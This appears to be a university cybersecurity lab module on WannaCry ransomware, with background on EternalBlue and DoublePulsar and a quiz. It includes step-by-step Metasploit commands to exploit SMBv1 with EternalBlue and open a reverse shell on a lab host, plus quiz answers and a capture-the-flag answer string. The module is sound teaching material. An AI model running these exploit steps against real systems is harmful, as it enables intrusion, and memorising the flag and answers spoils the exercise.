WannaCry Ransomware

Target Audience

Undergraduate
Graduate

Keywords

ransomware
zero-day vulnerabilities
malware

Introduction

Overview

In May of 2017, the ransomware worm known as WannaCry infected numerous organizations, causing significant damage. Over 200,000 systems were infected across 150 countries, with damages in the hundreds of millions of dollars. Prominent victims of WannaCry included Boeing, Honda, the NHS of England and Scotland, and the University of Montreal. The ransomware demanded a $300 Bitcoin payment in exchange for the decryption of the victim's files, with the amount increasing over time if left unpaid. On the same day of WannaCry's release, a hardcoded kill switch was discovered and promptly registered by a security researcher. While this did not help systems already infected, it effectively halted further spread of WannaCry within a matter of hours.

Vulnerability Details

WannaCry used the previously undisclosed EternalBlue vulnerability (CVE-2017-0144), which takes advantage of SMBv1 mishandling specially crafted packets, allowing for remote code execution. A backdoor implant tool known as DoublePulsar is also used. The tool is able to run in system memory, allowing it to stealthily install malware on the host. Both EternalBlue and DoublePulsar were believed to be originally developed by the NSA, and later stolen by the hacking group known as The Shadow Brokers, meaning they were not publicly known. Such vulnerabilities are called “Zero Days”, referring to the amount of days the vulnerability's existence has been known. Since previously unknown, security professionals have to begin developing patches the same day of release.

Learning Objectives

Describe Ransomware attacks
Explain zero-day vulnerabilities used in WannaCry ransomware
List common defense mechanisms against ransomware attack

Download

Remote Terminal

Terminal Description

In this lab, you'll step into the role of an attacker aiming to compromise a small organization's network to deploy ransomware, using a WiFi-connected terminal.

Use the help command to see all available commands.
The vulnerable machine's IP is 192.168.1.103.
Begin with nmap -p 139,445 192.168.1.0/24 to scan for open SMB ports.
Launch Metasploit with msfconsole, then use use auxiliary/scanner/smb/smb_ms17_010.
Set the target with set RHOST 192.168.1.103 and exploit with run.
Further exploit with use exploit/windows/smb/ms17_010_eternalblue, set payload with set payload generic/shell_reverse_tcp, and execute with exploit.

Learn more about the commands being utilized:

Module Questions

What was the primary method used by WannaCry to encrypt victims' data?Phishing emailsUSB drive infectionExploiting the EternalBlue vulnerabilityWebsite drive-by download

What type of software was WannaCry?AdwareRansomwareSpywareAntivirus

What was the role of DoublePulsar in the WannaCry attack?It was the decryption tool for victimsIt acted as a firewall against antivirus softwareIt was used to spread phishing emailsIt served as a backdoor for malware installation

How was WannaCry's spread significantly reduced?Activation of a hardcoded kill switchA global antivirus updateDisconnecting infected computers from the internetA worldwide system reboot

What could have prevented the WannaCry infection?Installing more antivirus softwareDisabling SMBv1 and applying security patchesChanging network passwords frequentlyUsing only mobile devices and tablets

What is the hidden flag after exploiting the vulnerable machine?35FW5x208cE70T801ju46U0o